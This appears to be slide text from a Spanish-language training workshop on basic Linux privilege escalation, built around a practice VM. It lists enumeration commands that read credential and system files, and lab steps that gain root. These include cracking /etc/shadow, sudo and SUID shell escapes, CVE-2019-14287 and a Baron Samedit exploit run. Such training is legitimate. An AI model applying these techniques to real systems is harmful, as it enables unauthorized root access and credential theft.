  • 5. >_Descargar .ova(MD5 b9ceb1bf1e0f55e8ed4da2598497dc41) >_Importar maquina a VirtualBox >_Misma Red Nat la maquina y nuestro Kali o Ubuntu >_Tomar instantánea & RUN ~# cat deploy_machine (ciberseg21:PrivescLab) >_Privesc - Escalada de Privilegios básica en Linux
  • 6. >_Kernel exploits (DirtyCOW) >_Programas ejecutándose “as root” (GTFOBINS) >_Vulns/Exploits servicios >_Daemons (sshd,nfsd,apache2,exim) >_Password Mining(Memory,Files,Hist…) >_SUID/GUID malconfigurado ~# find . ways_to_privesc_Linux_1_2 >_Privesc - Escalada de Privilegios básica en Linux
  • 7. >_Abuso “sudo-rights” >_scripts editables “invoked by root” >_Directorios/Files malconfigurados >_cronjobs >_Unmounted filesystems ~# find ways_to_privesc_Linux_2_2 >_Privesc - Escalada de Privilegios básica en Linux
  • 8. >_Read/Write/Delete any sensitive file >_Persist easily between reboots >_Insert a permanent backdoor ~# cat targets_privesc >_Privesc - Escalada de Privilegios básica en Linux
  • 9. >_Enumeración && Enumeración && Enum… >_Analizar - Procesar los datos >_Saber lo que buscar y buscar exploit >_Adaptar el exploit (Customize) >_Éxito y error ~# find . steps_to_privesc >_Privesc - Escalada de Privilegios básica en Linux
  • 10. $ cat /etc/issue $ cat /etc/*-release $ cat /etc/lsb-release $ lsb-release $ cat /proc/version $ uname –a $ cat /etc/profile $ cat /etc/bashrc $ cat ~/.bash_profile $ cat ~/.bashrc $ cat ~/.bash_logout $ env $ set ~# cat enum os_env_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 11. $ ps aux $ ps -ef $ top $ ps aux | grep root $ ps -ef | grep root $ ls -alh /usr/bin/ $ ls -alh /sbin/ $ dpkg -l ~# cat enum app_serv_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 12. $ cat /etc/syslog.conf $ cat /etc/chttp.conf $ cat /etc/lighttpd.conf $ cat /etc/cups/cupsd.conf $ cat /etc/inetd.conf $ cat /etc/apache2/apache2.conf $ cat /etc/my.conf $ cat /etc/httpd/conf/httpd.conf $ cat /opt/lampp/etc/httpd.conf $ ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ ~# cat enum app_serv_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 13. >_SUID (Set User-ID) && GUID (Set Group-ID) $ find / -perm /4000 2>/dev/null $ find / -perm -2000 2>/dev/null $ find / -perm -u=s -type f 2>/dev/null $ find / -perm -g=s -type f 2>/dev/null $ find / -perm 2 ! -type l –ls $ find / -xdev (-perm 4000) -type f -print0 -exec ls -s {} ; $ find / -user root -perm -4000 -exec ls -ldb {} ; ~# cat enum suid_guid_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 14. >_SUDO rigths $ sudo –l $ sudo –V $ cat /etc/sudoers $ sudoedit -s '' `python -c 'print("A"*1000)'` $ sudoedit -s '' `perl -e 'print "A" x 65536'` ~# cat enum sudo_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 15. >_Scripts invoke to root $ find / -writable -type d 2>/dev/null $ find / -perm -222 -type d 2>/dev/null $ find / -perm -o w -type d 2>/dev/null $ find / -perm -o x -type d 2>/dev/null $ find / ( -perm -o w -perm -o x ) -type d 2>/dev/null ~# cat enum scripst_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 16. $ ls –l /etc/shadow $ ls –l /etc/passwd $ find / -not -type l -perm -o+w ~# cat weak_perm_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 17. >_cronjob $ crontab –l $ ls -la /etc/cron.d $ find / -perm -2 -type f 2>/dev/null | grep cron $ ls -alh /var/spool/cron $ ls -al /etc/ | grep cron $ ls -al /etc/cron* $ cat /etc/cron* $ cat /etc/at.allow $ cat /etc/at.deny $ cat /etc/cron.allow $ cat /etc/cron.deny $ cat /etc/crontab $ cat /etc/anacrontab $ cat /var/spool/cron/crontabs/root ~# cat enum cronjob_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 18. $ cd /tmp $ cd /var/tmp $ cd /dev/shm $ cd /var/spool/vbox $ cd /var/spool/samba ~# cat enum usefull_paths_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 19. $ grep -i user [filename] $ grep -i pass [filename] $ grep -C 5 "password" [filename] $ find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" ~# cat enum passwords_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 20. $ /sbin/ifconfig –a $ cat /etc/network/interfaces $ cat /etc/sysconfig/network $ lsof -i $ lsof -i :80 $ grep 80 /etc/services $ netstat -antup $ netstat –antpx $ netstat -tulpn $ chkconfig –list $ chkconfig --list | grep 3:on $ last $ w $ arp –a $ route $ /sbin/route -nee $ cat /etc/resolv.conf $ cat /etc/sysconfig/network $ cat /etc/networks $ iptables –L $ hostname $ dnsdomainname ~# cat enum network_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 21. >_LinEnum (https://github.com/rebootuser/LinEnum ) >_LinuxPrivChecker (https://github.com/sleventyeleven/linuxprivchecker) >_RootHelper (https://github.com/NullArray/RootHelper ) >_LinPEAS (https://github.com/carlospolop/privilege- escalation-awesome-scripts-suite/tree/master/linPEAS) >_linux-smart-enumeration (https://github.com/diego- treitos/linux-smart-enumeration) >_uptux (https://github.com/initstring/uptux) >_post/multi/recon/local_exploit_suggester (Metasploit) ~# cat scripts_recon_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
  • 22. >_Privesc - Escalada de Privilegios básica en Linux >_Demo
  • 23. 1. Weak file/Dir permissions ssh -p 20000 ciberseg@IP Recon $ ls –l /etc/shadow $ ls –l /etc/passwd Explota (Kali) $ cat /etc/shadow $ john --wordlist=/usr/share/wordlists/rockyou.txt hash $ su root ~# cat lab_Linux (ciberseg:ciberseg) >_Privesc - Escalada de Privilegios básica en Linux
  • 24. 1 Weak file/Dir permissions Explota (rockyou) $ ls -l /etc/shadow $ mkpasswd -m sha-512 newpasswordhere $ su root ------------ $ ls -l /etc/passwd $ openssl passwd newpasswordhere $ su root ~# cat lab_Linux (ciberseg:ciberseg) >_Privesc - Escalada de Privilegios básica en Linux
  • 25. 2. Script as root & sudoers abusing $ ssh -p 40000 ciberseg@IP Recon $ sudo –l Explota $ echo "/bin/bash -i" >> $ chmod +x $ sudo ./ ---------- >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 26. 2. Script as root & Suders abusing Explota $ sudo vi -c '!bash‘ ----------- $ nano /var/opt/../../etc/sudoers $ sudo –i https://medium.com/schkn/linux-privilege-escalation-using- text-editors-and-files-part-1-a8373396708d >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 27. 3. CVE-2019-14287 sudoers $ ssh -p 50000 ciberseg@IP Recon $ sudo –l Explota $ sudo -l $ sudo -u#-1 /bin/bash https://www.hackingarticles.in/sudo-security-policy-bypass- vulnerability-cve-2019-14287/ https://www.sudo.ws/alerts/minus_1_uid.html >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 28. 4. Perls explotation $ ssh -p 60000 ciberseg@IP Recon $ sudo –l Explota $ sudo perl -e ‘exec "/bin/bash";‘ https://gtfobins.github.io/gtfobins/perl/#shell >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 29. 5. Abusing SUID $ ssh -p 61000 ciberseg@IP Recon $ find / -user root -perm -4000 -exec ls -ldb {} ; Explota $ touch ciberseg find ciberseg -exec /bin/bash ; -quit $ whoami https://www.hackingarticles.in/linux-privilege-escalation- using-suid-binaries/ >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 30. 6. CVE-2021-3156 sudo is vulnerable $ ssh -p 64000 ciberseg@IP Recon $ sudo –V Explota $ Make $ ./exploit https://blog.qualys.com/vulnerabilities- research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow- in-sudo-baron-samedit https://github.com/CptGibbon/CVE-2021-3156 >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 31. 7. Capabilities $ ssh -p 65000 ciberseg@IP Recon $ getcap -r / 2>/dev/null $ which tar Explota $ sudo setcap cap_dac_read_search=ep /bin/tar $ tar -cvf shadow_backup.tar /etc/shadow $ ls -la shadow_backup.tar $ tar -xzvf shadow_backup.tar >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
  • 32. >_Privesc - Escalada de Privilegios básica en Linux Thanks! You can find me at @1r0Dm48O 👍